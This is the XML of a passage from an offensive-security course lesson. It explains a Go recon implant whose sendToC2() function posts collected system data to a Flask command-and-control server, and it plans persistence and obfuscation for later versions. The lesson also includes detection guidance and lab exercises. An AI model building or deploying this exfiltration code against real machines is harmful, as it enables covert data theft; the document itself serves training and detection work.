          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">os.WriteFile is a one-shot convenience function — it creates the file if it does not exist, or truncates and overwrites it if it does. The []byte() cast converts the string to a byte slice as required by the function signature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Writing to disk creates a forensic artefact. A digital forensics investigator examining this machine would find C:\temp\recon_combined.txt in the filesystem. Even if the file is deleted, the inode timestamps and MFT records can reveal it existed. This trade-off is discussed in the obfuscation lessons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 The sendToC2() Function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the exfiltration function. It reads the file we just wrote, constructs an HTTP POST request, and sends it to the Flask C2 server. The function is defined outside main() — in Go, any function at package scope is accessible within the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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">func sendToC2(url, filepath, hostID string) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    data, err := os.ReadFile(filepath)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if err != nil { return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req, err := http.NewRequest("POST", url, bytes.NewReader(data))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if err != nil { return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req.Header.Set("Content-Type", "application/octet-stream")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    req.Header.Set("X-Filename", "recon_combined.txt")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    req.Header.Set("X-Host", hostID)</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client := &amp;http.Client{ Timeout: 10 * time.Second }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    resp, err := client.Do(req)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if err != nil { return }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    defer resp.Body.Close()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respBody, _ := io.ReadAll(resp.Body)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    fmt.Printf("C2 Response: %s\n", string(respBody))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">http.NewRequest creates a request object — it does not send anything yet. We attach custom headers that the Flask C2 server expects: Content-Type tells Flask this is raw binary data, X-Filename is used to name the saved file on the C2 side, and X-Host identifies which target machine sent this beacon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The http.Client has a 10-second timeout. Without this, the program would hang indefinitely if the C2 server is unreachable. The defer resp.Body.Close() ensures the response body is always closed when the function returns, preventing a resource leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Version Comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is Version 1 — there is no prior version. The table below shows what was intentionally left out of this version and which future lesson introduces each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6DA4"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2E6DA4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Introduced 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Beacon loop (60s cycle)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Version 3</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Extended recon commands (netstat, tasklist, etc.)</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Version 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Registry persistence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Version 3</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String obfuscation (XOR)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Obfuscation Lesson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Sleep jitter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Obfuscation Lesson 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding how this code is detected is as important as understanding what it does. At this stage of the Pyramid of Pain, we are operating at the Network Artifact and Tool tier — relatively easy for a defender to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6DA4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2E6DA4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">What It Catches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Sysmon EventID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cmd.exe spawned as child process with systeminfo argument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Sysmon EventID 11</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File created at C:\temp\recon_combined.txt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Network IDS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HTTP POST to non-standard port (5000) with X-Host and X-Filename headers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AV hash signature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SHA-256 of the .exe — changes on every recompile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EDR process tree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cmd.exe child of your .exe binary — anomalous parent-child relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Build the binary and confirm it compiles without errors: GOOS=windows GOARCH=amd64 go build -o v1.exe net_scan.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the Flask C2 server (c2_server.py) and run the .exe on a Windows lab machine. Confirm the recon file appears in the uploads/ directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Wireshark on the C2 machine and capture the HTTP POST beacon. What headers are visible in plaintext? What does this tell you about the detectability of plain HTTP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings.exe (Sysinternals) or grep -a on the compiled binary. How many of the hardcoded values (C2 URL, file path) are visible in plaintext?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the code to add your workgroup name from systeminfo to the report header. Recompile and verify the new field appears in the uploaded file.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sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="280" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="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2026-03-30T18:12:37.445Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T18:12:37.446Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>